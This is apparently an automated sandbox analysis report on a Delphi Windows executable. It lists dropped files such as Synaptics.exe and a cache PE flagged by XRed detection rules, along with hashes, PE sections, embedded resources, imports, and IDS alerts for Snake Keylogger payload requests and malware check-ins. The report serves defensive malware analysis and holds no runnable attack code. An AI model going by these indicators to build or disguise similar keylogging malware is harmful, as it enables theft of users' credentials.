                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Category:dropped
                                                                                            Size (bytes):18387
                                                                                            Entropy (8bit):7.523057953697544
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                            Malicious:false
                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                            C:\Users\user\Documents\AFWAAFRXKO\~$NHPKIZUUSG.xlsx

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165
                                                                                            Entropy (8bit):1.3520167401771568
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:qs/FFyGff:qsyWf
                                                                                            MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                            SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                            SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                            SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                            Malicious:false
                                                                                            Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                            C:\Users\user\Documents\AFWAAFRXKO\~$cache1

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):771584
                                                                                            Entropy (8bit):6.6264053582391735
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                            MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                            SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                            SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 94%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.394144984665256
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:sl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNASOBSqa:k4vF0MYQUMM6VFYSSU
                                                                                            MD5:A154257AD4D6BEA3C547A023E1A98923
                                                                                            SHA1:8A07A8AC5132E84BC190F5CE5BDD897E74D7F4D2
                                                                                            SHA-256:A256FCEAFB82CC46994491866894D85545FC0EF1B3AA67EBA9123820057CE6F3
                                                                                            SHA-512:3DB5E34E084B9072D51B8C89ABCBDF794E3ACFC53F6369990B37E8F0F31D34527CC8784949E6435B227BFBF8EDFB8BF3AAC1A53AA1337D71978F5868F31BEC2B
                                                                                            Malicious:false
                                                                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmRU..L]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Windows\wordpad.INI

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                                                                                            File Type:Microsoft HTML Help Project
                                                                                            Category:dropped
                                                                                            Size (bytes):193
                                                                                            Entropy (8bit):4.113030939932765
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:1W4M4lqHj4yQltkkkkkkkkkkkkkkkkkkkkkkkkkov1ECN+CDktjkkkkkkkkkkkkI:U4lqHj4ZOCN+CDkbpKVyYWyn
                                                                                            MD5:72F2D357120F95C1E725C22915FE95E1
                                                                                            SHA1:2DC88926E0F7D12F4EEBCE672A865E1D43237DA1
                                                                                            SHA-256:AA99B989A67FCD5A7503102752C8B2ED339EC3011D437FCFBEDB1C53EE7D639F
                                                                                            SHA-512:534FC6DD52C3ACE8576F8A74E2211836AB15EF5B22323C370406D6B9A85AB528601DF797E4105F6924224F172048772A56C4D376ADB58C8035F6151629FAE89B
                                                                                            Malicious:false
                                                                                            Preview:[Options]..Wrap=0..ShowStatusBar=0..ShowRuler=0..Units=0..Maximized=0..FrameRect=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..PageMargin=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..PrintPageNum=0..DefaultFormat=5..

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.9488402694147355
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 93.21%
                                                                                            • Win32 Executable Borland Delphi 7 (665061/41) 6.20%
                                                                                            • InstallShield setup (43055/19) 0.40%
                                                                                            • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                            File name:file.exe
                                                                                            File size:6'490'624 bytes
                                                                                            MD5:e819c37952e89ff0f473fa9b59cd771d
                                                                                            SHA1:de2a344ed3a2b1f4e0fbd4e684170db56903763e
                                                                                            SHA256:05f954e37982086a48a222726b8134fbef0caa78dbe1b66a3d4479b712d12012
                                                                                            SHA512:1e3eff7391308a5161b75ab47ef29178a53ce08693c63fd08f5f1443ceeed87c3b4d3779265d669a91af0192eb556913bcbf77b825678580e44fceeb3c76d148
                                                                                            SSDEEP:196608:jLb7wqheSVYK/bua/BlWWnuVhsus8nm+q42:j/8qgSmIbr/Asb8nmFD
                                                                                            TLSH:7B662322F2C29137D1736A3C9C6B92A9982ABE512E38794B3BF51D4C5F3D7412C642D3
                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                            File Icon

                                                                                            Icon Hash:878fd7f3b9353593

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x49ab80
                                                                                            Entrypoint Section:CODE
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                            DLL Characteristics:
                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            add esp, FFFFFFF0h
                                                                                            mov eax, 0049A778h
                                                                                            call 00007F623920F66Dh
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            call 00007F6239262FB5h
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            mov edx, 0049ABE0h
                                                                                            call 00007F6239262BB4h
                                                                                            mov ecx, dword ptr [0049DBDCh]
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            mov edx, dword ptr [00496590h]
                                                                                            call 00007F6239262FA4h
                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                            mov eax, dword ptr [eax]
                                                                                            call 00007F6239263018h
                                                                                            call 00007F623920D14Bh
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x586088.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xb00000x5860880x586200633bb7b0bcb200e87057c548cdcb5b10unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                            RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                            RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                            RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                            RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                            RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                            RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                            RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                            RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                            RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                            RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                            RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                            RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                            RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                            RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                            RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                            RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                            RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                            RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.07223264540337711
                                                                                            RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                            RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                            RT_STRING0xb4af40x358data0.3796728971962617
                                                                                            RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                            RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                            RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                            RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                            RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                            RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                            RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                            RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                            RT_STRING0xb67b80xdcdata0.6
                                                                                            RT_STRING0xb68940x320data0.45125
                                                                                            RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                            RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                            RT_STRING0xb6da40x268data0.4707792207792208
                                                                                            RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                            RT_STRING0xb74040x378data0.41103603603603606
                                                                                            RT_STRING0xb777c0x380data0.35379464285714285
                                                                                            RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                            RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                            RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                            RT_STRING0xb800c0x368data0.40940366972477066
                                                                                            RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                            RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                            RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                            RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                            RT_RCDATA0xb8e040x10data1.5
                                                                                            RT_RCDATA0xb8e140x574358PE32 executable (GUI) Intel 80386, for MS Windows0.9792976379394531
                                                                                            RT_RCDATA0x62d16c0x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                            RT_RCDATA0x62d1700x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                            RT_RCDATA0x630d700x64cdata0.5998759305210918
                                                                                            RT_RCDATA0x6313bc0x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                            RT_RCDATA0x6315100x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                            RT_GROUP_CURSOR0x635ce40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                            RT_GROUP_CURSOR0x635cf80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                            RT_GROUP_CURSOR0x635d0c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                            RT_GROUP_CURSOR0x635d200x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                            RT_GROUP_CURSOR0x635d340x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                            RT_GROUP_CURSOR0x635d480x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                            RT_GROUP_CURSOR0x635d5c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                            RT_GROUP_ICON0x635d700x14dataTurkishTurkey1.1
                                                                                            RT_VERSION0x635d840x304dataTurkishTurkey0.42875647668393785

                                                                                            Imports

                                                                                            DLLImport
                                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                            user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                            advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                            kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                            user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                            ole32.dllCLSIDFromString
                                                                                            kernel32.dllSleep
                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                            ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                            oleaut32.dllGetErrorInfo, SysFreeString
                                                                                            comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                            shell32.dllShellExecuteExA, ExtractIconExW
                                                                                            wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                            shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                            advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                            wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                            netapi32.dllNetbios

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            TurkishTurkey

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-02T20:29:37.136706+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949788172.217.18.14443TCP
                                                                                            2025-01-02T20:29:37.224164+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949789172.217.18.14443TCP
                                                                                            2025-01-02T20:29:37.480368+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.94979769.42.215.25280TCP
                                                                                            2025-01-02T20:29:38.412011+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949802172.217.18.14443TCP
                                                                                            2025-01-02T20:29:38.423454+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949804172.217.18.14443TCP
                                                                                            2025-01-02T20:29:39.478865+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949814172.217.18.14443TCP
                                                                                            2025-01-02T20:29:39.492141+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949813172.217.18.14443TCP
                                                                                            2025-01-02T20:29:40.531218+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949825172.217.18.14443TCP
                                                                                            2025-01-02T20:29:40.532057+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949824172.217.18.14443TCP
                                                                                            2025-01-02T20:29:41.980642+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949844172.217.18.14443TCP
                                                                                            2025-01-02T20:29:42.044430+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949842172.217.18.14443TCP
                                                                                            2025-01-02T20:29:43.063109+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.949855172.217.18.14443TCP
